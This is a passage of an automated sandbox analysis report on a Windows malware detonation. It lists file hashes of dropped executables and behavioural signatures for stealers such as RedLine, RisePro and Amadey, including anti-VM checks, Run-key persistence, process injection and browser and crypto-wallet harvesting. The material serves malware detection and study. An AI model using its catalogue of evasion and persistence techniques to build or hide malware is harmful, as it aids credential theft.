memory/3456-475-0x0000000005A50000-0x0000000005A65000-memory.dmp
memory/3456-473-0x0000000005A50000-0x0000000005A65000-memory.dmp
memory/3456-471-0x0000000005A50000-0x0000000005A65000-memory.dmp
memory/3456-470-0x0000000005A50000-0x0000000005A65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
| MD5 | 07101cac5b9477ba636cd8ca7b9932cb |
| SHA1 | 59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1 |
| SHA256 | 488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77 |
| SHA512 | 02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887 |
memory/3888-578-0x000000001BE90000-0x000000001BEA2000-memory.dmp
memory/3888-577-0x000000001DEA0000-0x000000001DFAA000-memory.dmp
memory/3888-579-0x000000001C0E0000-0x000000001C11C000-memory.dmp
memory/2596-585-0x00000000007F0000-0x0000000000D22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
| MD5 | 3f4f5c57433724a32b7498b6a2c91bf0 |
| SHA1 | 04757ff666e1afa31679dd6bed4ed3af671332a3 |
| SHA256 | 0608a7559f895fab33ae65bbfbdc5bebd21eea984f76e1b5571c80906824d665 |
| SHA512 | cf572ca616b4f4e6e472e33e8d6d90b85d5885fa64d8bca4507450d66d65057efa771f58c31ea13f394fd0e7b0ff2fcaa9d54c61f28b27b98a79c27bc964f935 |
C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe
| MD5 | 13e5872e9b7c47090e035dc228c5589f |
| SHA1 | c55a9708091f19b5fc5baf7c37beb99d8d3bf760 |
| SHA256 | d6cfb9d6c862be5a244eb5e4c6339312f74b7eb57cad8d08f56e3de0024b2bbc |
| SHA512 | 260671baa8f30e2364b21ab0a9cd3d8a104f76032ebfd3684150d8c318b9cb759b246ae8df25274e864053a6d55bdb77e028452b1d91999b37efc291f8ee815e |
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
| MD5 | bbd06263062b2c536b5caacdd5f81b76 |
| SHA1 | c38352c1c08fb0fa5e67a079998ef30ebc962089 |
| SHA256 | 1875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9 |
| SHA512 | 7faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad |
C:\Windows\System32\.co3BCC.tmp
| MD5 | e4b86504b7f85a6248e3dfd4e2e9fdf5 |
| SHA1 | d932f240e9b50e58ee4962040d6c856d98630c09 |
| SHA256 | ae0b50c7c42615b19e0c4cf5d05611ca1e057929b8065fe9a99d7a492c9b441a |
| SHA512 | 7baac3b3eac897e06c7f7623d563fa9ab90c26ff04783a511a241ae59755316c9a580d7b91d0e227c6df14a21c4750c6c0a52f02e9c9282b597686878216ffa2 |
memory/4944-684-0x0000000000400000-0x0000000000470000-memory.dmp
memory/2228-687-0x0000000000680000-0x0000000000B3F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\169499791354
| MD5 | 26f4e6c57aa6b9323cf7088c13d15c91 |
| SHA1 | 10e024c6f82789dbc1e7ff85f69e9ad867a92c14 |
| SHA256 | 6218742d0cb90bc206aa2f82054f4245baa58cb918746e77f7e3efd82e30d116 |
| SHA512 | 41d37388f1351ce05242e3cbac333689075d55552f3c0cf66d5c920d5dc307b9d3353ec0a34406e1f0c6dfb124ed1d8012a3c584a120f1732083ba023e0403ef |
memory/4944-697-0x00000000086C0000-0x000000000870C000-memory.dmp
memory/408-709-0x0000000000680000-0x0000000000B3F000-memory.dmp
memory/3836-708-0x00000000009A0000-0x0000000000E5A000-memory.dmp
memory/3836-711-0x00000000009A0000-0x0000000000E5A000-memory.dmp
memory/408-713-0x0000000000680000-0x0000000000B3F000-memory.dmp
memory/2820-797-0x000001752A160000-0x000001752A17C000-memory.dmp
memory/2820-798-0x000001752A180000-0x000001752A235000-memory.dmp
memory/2820-799-0x000001752A240000-0x000001752A24A000-memory.dmp
memory/2820-800-0x000001752A3B0000-0x000001752A3CC000-memory.dmp
memory/2820-801-0x000001752A390000-0x000001752A39A000-memory.dmp
memory/2820-802-0x000001752A3F0000-0x000001752A40A000-memory.dmp
memory/2820-803-0x000001752A3A0000-0x000001752A3A8000-memory.dmp
memory/2820-804-0x000001752A3D0000-0x000001752A3D6000-memory.dmp
memory/2820-805-0x000001752A3E0000-0x000001752A3EA000-memory.dmp
memory/2932-914-0x000001A1F0570000-0x000001A1F058A000-memory.dmp
memory/2932-913-0x000001A1F0510000-0x000001A1F051E000-memory.dmp
memory/2700-960-0x00000000009A0000-0x0000000000E5A000-memory.dmp
memory/5020-959-0x0000000000680000-0x0000000000B3F000-memory.dmp
memory/5020-962-0x0000000000680000-0x0000000000B3F000-memory.dmp
memory/2700-964-0x00000000009A0000-0x0000000000E5A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-18 12:27
Reported
2024-06-18 12:30
Platform
win11-20240508-en
Max time kernel
121s
Max time network
153s
Command Line
Signatures
Amadey
Detects Monster Stealer.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Exela Stealer
Monster
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\f2e8263483.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\f2e8263483.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\.co1A78.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\.co1A78.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\winsvc.exe | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2148 set thread context of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3528 set thread context of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4928 set thread context of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 1876 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3632 set thread context of 2572 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\system32\conhost.exe |
| PID 3632 set thread context of 4132 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
